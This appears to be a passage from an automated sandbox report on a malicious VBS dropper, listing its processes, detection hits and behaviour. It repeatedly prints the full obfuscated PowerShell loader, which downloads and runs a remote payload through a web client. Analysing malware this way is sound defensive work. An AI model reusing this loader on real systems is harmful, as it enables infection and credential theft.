tr skaZLevno Sc,K cya/ MetSGospkT.ero ForrForgt in e indrB,na.Li erOxheaUnk.r';$Langspytsnderzoner=Recheck 'Uroe>';$Modeordet=Recheck 'Be bIUnavEUkriX';$Opmuntringstalernes='Variolous';$Orchestiidae221='\Pestersome.Lin';Vedligeholdelsesvejledningerne148 (Recheck 'Skil$Uni GBidrlHil oStv,bDeceaMiljLDall:BimemhypeeCawnL,sona H,eNOpveT Hy hUdenyL,gh=Be y$YnglEGlutNinstVA vi:D.aga FemP Stiplysadi teARverTKlokaRome+Unfo$SteaO AborQuayCSp ohTillEUn uSPe itBikuIh noiEnerDCricAL kfe ace2R dg2Anic1');Vedligeholdelsesvejledningerne148 (Recheck 'bldd$Am hgK.isLeremoE tsbSe vA,eatL ehu: SpaaA.agflaegbSkorAHuskLSp,raVarinMegac U,fS gemnCorpR Cot=Draw$SmugfRefloButirMyt.eNonpWS gbIS,lanH ndgKoliSo in1Supe3 I.c8Ins,.Af,es nhypTracLOv riHexotVill(Ch l$ CallSkulaJemmnBethgsoulsIndvpP.ogYin ptPaavsAstrn eprDTandENonprS ndzU.daOPa tn rkrEUnglRTe p)');Vedligeholdelsesvejledningerne148 (Recheck $Langspytsncursion);$Forewings138=$Afbalancsnr[0];$Hunstiks=(Recheck ' ar$SuppG SqulKlemo B gBOverA ell ,ue:PensuAfgrpPrimPIndei Negt emiyUnknn arECoshsIncosAxon=UnmanMod EMelaWGo f-ExcaOKricB AfgJChloeC nscArcttLben OverSTn,eY FjasParfTC.ysE Cirmrema.Depr$AntiCSalaa onsrP rtICo dcmyrdAP ntt Vo,U GanRGimbeTank5
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Tankningerne249='Knaldfilmens';;$Langspytsndsejling='Evoker180';;$Kommunikeg='Sortermuligheden';;$Assuranceselskabernes='Tinglysningskontorers';;$Rosalies=$host.Name;function Recheck($Norroy){If ($Rosalies) {$Nyvurderet='Centralforeningers';$Rigsdanskens=4} for ($Langspyts=$Rigsdanskens;;$Langspyts+=5){if(!$Norroy[$Langspyts]){$Rrflangerne++;break }$deponeringsbehovet+=$Norroy[$Langspyts];$Bibliotekaren='Trepaneringers'}$deponeringsbehovet}function Vedligeholdelsesvejledningerne148($Unlyrical){ .($Modeordet) ($Unlyrical)}$Caricature58=Recheck 'PrimnPeskeT tatImp .ElekW';$Caricature58+=Recheck 'ImmoeAsteBKin CSpecLF,ogIProdEschmnlastT';$Udhngstag=Recheck 'JuleMKonjo lazSubmiLon l pralS riaU,dd/';$Udbygningsplaner=Recheck 'InstT .thl NorsFort1Genn2';$Langspytsncursion='Cont[M,chNFat eCirctSem,.Va eSTermESundR afVSm siAlteCskr E,mpopSoiloSp,ci Un nAr,etIstamSokeAtracN CosAFedtg SupEWidoRCera]For :Over:S.ersm,diESkv c A bU,arlrSkvhiKoldTDittyPrimpConfrNoblOBivuTIdoloForbcVenuo ManlTstr=Kult$TrstuRaekDSpirbkjrsYGrovG HaknSch IAymaNKontGBetoSPljePA grLPultANiggn ejre eboR';$Udhngstag+=Recheck 'Prim5Aksi.Dato0Til. Nege(MangW CepiSavonV rkdShiroA.rawBidsspoli S ieNBlasT Mei Vali1Eng,0cifr.Otio0Ista;Soci NugaWSteriFormnNapa6Unho4 Bav;Hell SmlxKede6 Beq4Smle;Over KrerS,itv .yn:Div.1Unav3 Exi1Tryp.Va o0Cond)S jo Asl,G Pine Tenc ShekIndkoUdpo/Fi,r2Mult0 Fo,1No d0Firb0 Cow1fess0Fo,u1Affa LagF onri jarS ene aunfUlykoTr,lx pr /B.it1Lept3S.ra1Macr.Dagn0';$Terrestrialism=Recheck 'SnavUR.baSCatheT.gnr Mas- KonaMarrGlagrEFin,nT.taT';$Forewings138=Recheck 'SpalhGenot .tatOutqpOvers Ch :Unde/,air/HospoAutof N n1 undx ppi.CamaiPengc okuu Ast/ ablXFl,er UdsVkorsFPa tr skaZLevno Sc,K cya/ MetSGospkT.ero ForrForgt in e indrB,na.Li erOxheaUnk.r';$Langspytsnderzoner=Recheck 'Uroe>';$Modeordet=Recheck 'Be bIUnavEUkriX';$Opmuntringstalernes='Variolous';$Orchestiidae221='\Pestersome.Lin';Vedligeholdelsesvejledningerne148 (Recheck 'Skil$Uni GBidrlHil oStv,bDeceaMiljLDall:BimemhypeeCawnL,sona H,eNOpveT Hy hUdenyL,gh=Be y$YnglEGlutNinstVA vi:D.aga FemP Stiplysadi teARverTKlokaRome+Unfo$SteaO AborQuayCSp ohTillEUn uSPe itBikuIh noiEnerDCricAL kfe ace2R dg2Anic1');Vedligeholdelsesvejledningerne148 (Recheck 'bldd$Am hgK.isLeremoE tsbSe vA,eatL ehu: SpaaA.agflaegbSkorAHuskLSp,raVarinMegac U,fS gemnCorpR Cot=Draw$SmugfRefloButirMyt.eNonpWS gbIS,lanH ndgKoliSo in1Supe3 I.c8Ins,.Af,es nhypTracLOv riHexotVill(Ch l$ CallSkulaJemmnBethgsoulsIndvpP.ogYin ptPaavsAstrn eprDTandENonprS ndzU.daOPa tn rkrEUnglRTe p)');Vedligeholdelsesvejledningerne148 (Recheck $Langspytsncursion);$Forewings138=$Afbalancsnr[0];$Hunstiks=(Recheck ' ar$SuppG SqulKlemo B gBOverA ell ,ue:PensuAfgrpPrimPIndei Negt emiyUnknn arECoshsIncosAxon=UnmanMod EMelaWGo f-ExcaOKricB AfgJChloeC nscArcttLben OverSTn,eY FjasParfTC.ysE Cirmrema.Depr$AntiCSalaa onsrP rtICo dcmyrdAP ntt Vo,U GanRGimbeTank5Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,9_2_0040DD85
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00401806 NtdllDefWindowProc_W,9_2_00401806
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_004018C0 NtdllDefWindowProc_W,9_2_004018C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004016FD NtdllDefWindowProc_A,10_2_004016FD
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004017B7 NtdllDefWindowProc_A,10_2_004017B7
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00402CAC NtdllDefWindowProc_A,11_2_00402CAC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00402D66 NtdllDefWindowProc_A,11_2_00402D66
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848E8AB4A2_2_00007FF848E8AB4A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848E8B8D22_2_00007FF848E8B8D2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0474E9284_2_0474E928
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0474F1F84_2_0474F1F8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0474E5E04_2_0474E5E0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_238E71947_2_238E7194
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_238DB5C17_2_238DB5C1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0044B0409_2_0044B040
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0043610D9_2_0043610D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_004473109_2_00447310
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0044A4909_2_0044A490
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0040755A9_2_0040755A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0043C5609_2_0043C560
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0044B6109_2_0044B610
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0044D6C09_2_0044D6C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_004476F09_2_004476F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0044B8709_2_0044B870
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0044081D9_2_0044081D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_004149579_2_00414957
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_004079EE9_2_004079EE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00407AEB9_2_00407AEB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0044AA809_2_0044AA80
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00412AA99_2_00412AA9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00404B749_2_00404B74
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00404B039_2_00404B03
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0044BBD89_2_0044BBD8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00404BE59_2_00404BE5
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00404C769_2_00404C76
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00415CFE9_2_00415CFE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00416D729_2_00416D72
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00446D309_2_00446D30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00446D8B9_2_00446D8B
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00406E8F9_2_00406E8F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040503810_2_00405038
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0041208C10_2_0041208C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004050A910_2_004050A9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040511A10_2_0040511A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0043C13A10_2_0043C13A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004051AB10_2_004051AB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044930010_2_00449300
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040D32210_2_0040D322
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044A4F010_2_0044A4F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0043A5AB10_2_0043A5AB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0041363110_2_00413631
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044669010_2_00446690
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044A73010_2_0044A730
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004398D810_2_004398D8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004498E010_2_004498E0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044A88610_2_0044A886
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0043DA0910_2_0043DA09
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00438D5E10_2_00438D5E
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00449ED010_2_00449ED0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0041FE8310_2_0041FE83
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00430F5410_2_00430F54
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004050C211_2_004050C2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004014AB11_2_004014AB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0040513311_2_00405133
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004051A411_2_004051A4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0040124611_2_00401246
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0040CA4611_2_0040CA46
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0040523511_2_00405235
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004032C811_2_004032C8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0040168911_2_00401689
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00402F6011_2_00402F60
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00416760 appears 69 times
              Source: Reqt 83291.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6529
              Source: unknownProcess created: Commandline size = 6529
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6529Jump to behavior
              Source: amsi32_5692.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 4088, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 5692, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@14/10@2/3
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,9_2_004182CE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,11_2_00410DE1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,9_2_00418758
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,9_2_00413D4C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource,9_2_004148B6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Pestersome.LinJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6148:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_03
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-D98D6X
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c31ub3dd.zff.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Reqt 83291.vbs"
              Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4088
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5692
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: msiexec.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: msiexec.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: msiexec.exe, 00000007.00000002.3329761154.0000000023D10000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: msiexec.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: msiexec.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: msiexec.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: msiexec.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: C:\Windows\SysWOW64\msiexec.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_10-33236
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Reqt 83291.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Tankningerne249='Knaldfilmens';;$Langspytsndsejling='Evoker180';;$Kommunikeg='Sortermuligheden';;$Assuranceselskabernes='Tinglysningskontorers';;$Rosalies=$host.Name;function Recheck($Norroy){If ($Rosalies) {$Nyvurderet='Centralforeningers';$Rigsdanskens=4} for ($Langspyts=$Rigsdanskens;;$Langspyts+=5){if(!$Norroy[$Langspyts]){$Rrflangerne++;break }$deponeringsbehovet+=$Norroy[$Langspyts];$Bibliotekaren='Trepaneringers'}$deponeringsbehovet}function Vedligeholdelsesvejledningerne148($Unlyrical){ .($Modeordet) ($Unlyrical)}$Caricature58=Recheck 'PrimnPeskeT tatImp .ElekW';$Caricature58+=Recheck 'ImmoeAsteBKin CSpecLF,ogIProdEschmnlastT';$Udhngstag=Recheck 'JuleMKonjo lazSubmiLon l pralS riaU,dd/';$Udbygningsplaner=Recheck 'InstT .thl NorsFort1Genn2';$Langspytsncursion='Cont[M,chNFat eCirctSem,.Va eSTermESundR afVSm siAlteCskr E,mpopSoiloSp,ci Un nAr,etIstamSokeAtracN CosAFedtg SupEWidoRCera]For :Over:S.ersm,diESkv c A bU,arlrSkvhiKoldTDittyPrimpConfrNoblOBivuTIdoloForbcVenuo ManlTstr=Kult$TrstuRaekDSpirbkjrsYGrovG HaknSch IAymaNKontGBetoSPljePA grLPultANiggn ejre eboR';$Udhngstag+=Recheck 'Prim5Aksi.Dato0Til. Nege(MangW CepiSavonV rkdShiroA.rawBidsspoli S ieNBlasT Mei Vali1Eng,0cifr.Otio0Ista;Soci NugaWSteriFormnNapa6Unho4 Bav;Hell SmlxKede6 Beq4Smle;Over KrerS,itv .yn:Div.1Unav3 Exi1Tryp.Va o0Cond)S jo Asl,G Pine Tenc ShekIndkoUdpo/Fi,r2Mult0 Fo,1No d0Firb0 Cow1fess0Fo,u1Affa LagF onri jarS ene aunfUlykoTr,lx pr /B.it1Lept3S.ra1Macr.Dagn0';$Terrestrialism=Recheck 'SnavUR.baSCatheT.gnr Mas- KonaMarrGlagrEFin,nT.taT';$Forewings138=Recheck 'SpalhGenot .tatOutqpOvers Ch :Unde/,air/HospoAutof N n1 undx ppi.CamaiPengc okuu Ast/ ablXFl,er UdsVkorsFPa tr skaZLevno Sc,K cya/ MetSGospkT.ero ForrForgt in e indrB,na.Li erOxheaUnk.r';$Langspytsnderzoner=Recheck 'Uroe>';$Modeordet=Recheck 'Be bIUnavEUkriX';$Opmuntringstalernes='Variolous';$Orchestiidae221='\Pestersome.Lin';Vedligeholdelsesvejledningerne148 (Recheck 'Skil$Uni GBidrlHil oStv,bDeceaMiljLDall:BimemhypeeCawnL,sona H,eNOpveT Hy hUdenyL,gh=Be y$YnglEGlutNinstVA vi:D.aga FemP Stiplysadi teARverTKlokaRome+Unfo$SteaO AborQuayCSp ohTillEUn uSPe itBikuIh noiEnerDCricAL kfe ace2R dg2Anic1');Vedligeholdelsesvejledningerne148 (Recheck 'bldd$Am hgK.isLeremoE tsbSe vA,eatL ehu: SpaaA.agflaegbSkorAHuskLSp,raVarinMegac U,fS gemnCorpR Cot=Draw$SmugfRefloButirMyt.eNonpWS gbIS,lanH ndgKoliSo in1Supe3 I.c8Ins,.Af,es nhypTracLOv riHexotVill(Ch l$ CallSkulaJemmnBethgsoulsIndvpP.ogYin ptPaavsAstrn eprDTandENonprS ndzU.daOPa tn rkrEUnglRTe p)');Vedligeholdelsesvejledningerne148 (Recheck $Langspytsncursion);$Forewings138=$Afbalancsnr[0];$Hunstiks=(Recheck ' ar$SuppG SqulKlemo B gBOverA ell ,ue:PensuAfgrpPrimPIndei Negt emiyUnknn arECoshsIncosAxon=UnmanMod EMelaWGo f-ExcaOKricB AfgJChloeC nscArcttLben OverSTn,eY FjasParfTC.ysE Cirmrema.Depr$AntiCSalaa onsrP rtICo dcmyrdAP ntt Vo,U GanRGimbeTank5
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Tankningerne249='Knaldfilmens';;$Langspytsndsejling='Evoker180';;$Kommunikeg='Sortermuligheden';;$Assuranceselskabernes='Tinglysningskontorers';;$Rosalies=$host.Name;function Recheck($Norroy){If ($Rosalies) {$Nyvurderet='Centralforeningers';$Rigsdanskens=4} for ($Langspyts=$Rigsdanskens;;$Langspyts+=5){if(!$Norroy[$Langspyts]){$Rrflangerne++;break }$deponeringsbehovet+=$Norroy[$Langspyts];$Bibliotekaren='Trepaneringers'}$deponeringsbehovet}function Vedligeholdelsesvejledningerne148($Unlyrical){ .($Modeordet) ($Unlyrical)}$Caricature58=Recheck 'PrimnPeskeT tatImp .ElekW';$Caricature58+=Recheck 'ImmoeAsteBKin CSpecLF,ogIProdEschmnlastT';$Udhngstag=Recheck 'JuleMKonjo lazSubmiLon l pralS riaU,dd/';$Udbygningsplaner=Recheck 'InstT .thl NorsFort1Genn2';$Langspytsncursion='Cont[M,chNFat eCirctSem,.Va eSTermESundR afVSm siAlteCskr E,mpopSoiloSp,ci Un nAr,etIstamSokeAtracN CosAFedtg SupEWidoRCera]For :Over:S.ersm,diESkv c A bU,arlrSkvhiKoldTDittyPrimpConfrNoblOBivuTIdoloForbcVenuo ManlTstr=Kult$TrstuRaekDSpirbkjrsYGrovG HaknSch IAymaNKontGBetoSPljePA grLPultANiggn ejre eboR';$Udhngstag+=Recheck 'Prim5Aksi.Dato0Til. Nege(MangW CepiSavonV rkdShiroA.rawBidsspoli S ieNBlasT Mei Vali1Eng,0cifr.Otio0Ista;Soci NugaWSteriFormnNapa6Unho4 Bav;Hell SmlxKede6 Beq4Smle;Over KrerS,itv .yn:Div.1Unav3 Exi1Tryp.Va o0Cond)S jo Asl,G Pine Tenc ShekIndkoUdpo/Fi,r2Mult0 Fo,1No d0Firb0 Cow1fess0Fo,u1Affa LagF onri jarS ene aunfUlykoTr,lx pr /B.it1Lept3S.ra1Macr.Dagn0';$Terrestrialism=Recheck 'SnavUR.baSCatheT.gnr Mas- KonaMarrGlagrEFin,nT.taT';$Forewings138=Recheck 'SpalhGenot .tatOutqpOvers Ch :Unde/,air/HospoAutof N n1 undx ppi.CamaiPengc okuu Ast/ ablXFl,er UdsVkorsFPa tr skaZLevno Sc,K cya/ MetSGospkT.ero ForrForgt in e indrB,na.Li erOxheaUnk.r';$Langspytsnderzoner=Recheck 'Uroe>';$Modeordet=Recheck 'Be bIUnavEUkriX';$Opmuntringstalernes='Variolous';$Orchestiidae221='\Pestersome.Lin';Vedligeholdelsesvejledningerne148 (Recheck 'Skil$Uni GBidrlHil oStv,bDeceaMiljLDall:BimemhypeeCawnL,sona H,eNOpveT Hy hUdenyL,gh=Be y$YnglEGlutNinstVA vi:D.aga FemP Stiplysadi teARverTKlokaRome+Unfo$SteaO AborQuayCSp ohTillEUn uSPe itBikuIh noiEnerDCricAL kfe ace2R dg2Anic1');Vedligeholdelsesvejledningerne148 (Recheck 'bldd$Am hgK.isLeremoE tsbSe vA,eatL ehu: SpaaA.agflaegbSkorAHuskLSp,raVarinMegac U,fS gemnCorpR Cot=Draw$SmugfRefloButirMyt.eNonpWS gbIS,lanH ndgKoliSo in1Supe3 I.c8Ins,.Af,es nhypTracLOv riHexotVill(Ch l$ CallSkulaJemmnBethgsoulsIndvpP.ogYin ptPaavsAstrn eprDTandENonprS ndzU.daOPa tn rkrEUnglRTe p)');Vedligeholdelsesvejledningerne148 (Recheck $Langspytsncursion);$Forewings138=$Afbalancsnr[0];$Hunstiks=(Recheck ' ar$SuppG SqulKlemo B gBOverA ell ,ue:PensuAfgrpPrimPIndei Negt emiyUnknn arECoshsIncosAxon=UnmanMod EMelaWGo f-ExcaOKricB AfgJChloeC nscArcttLben OverSTn,eY FjasParfTC.ysE Cirmrema.Depr$AntiCSalaa onsrP rtICo dcmyrdAP ntt Vo,U GanRGimbeTank5
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\lahohqpsrcskvvhwhdioicctkhlgz"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vcmhhjaufkkpxkvaqovqlgwctnupsinbp"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xwrzi"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Tankningerne249='Knaldfilmens';;$Langspytsndsejling='Evoker180';;$Kommunikeg='Sortermuligheden';;$Assuranceselskabernes='Tinglysningskontorers';;$Rosalies=$host.Name;function Recheck($Norroy){If ($Rosalies) {$Nyvurderet='Centralforeningers';$Rigsdanskens=4} for ($Langspyts=$Rigsdanskens;;$Langspyts+=5){if(!$Norroy[$Langspyts]){$Rrflangerne++;break }$deponeringsbehovet+=$Norroy[$Langspyts];$Bibliotekaren='Trepaneringers'}$deponeringsbehovet}function Vedligeholdelsesvejledningerne148($Unlyrical){ .($Modeordet) ($Unlyrical)}$Caricature58=Recheck 'PrimnPeskeT tatImp .ElekW';$Caricature58+=Recheck 'ImmoeAsteBKin CSpecLF,ogIProdEschmnlastT';$Udhngstag=Recheck 'JuleMKonjo lazSubmiLon l pralS riaU,dd/';$Udbygningsplaner=Recheck 'InstT .thl NorsFort1Genn2';$Langspytsncursion='Cont[M,chNFat eCirctSem,.Va eSTermESundR afVSm siAlteCskr E,mpopSoiloSp,ci Un nAr,etIstamSokeAtracN CosAFedtg SupEWidoRCera]For :Over:S.ersm,diESkv c A bU,arlrSkvhiKoldTDittyPrimpConfrNoblOBivuTIdoloForbcVenuo ManlTstr=Kult$TrstuRaekDSpirbkjrsYGrovG HaknSch IAymaNKontGBetoSPljePA grLPultANiggn ejre eboR';$Udhngstag+=Recheck 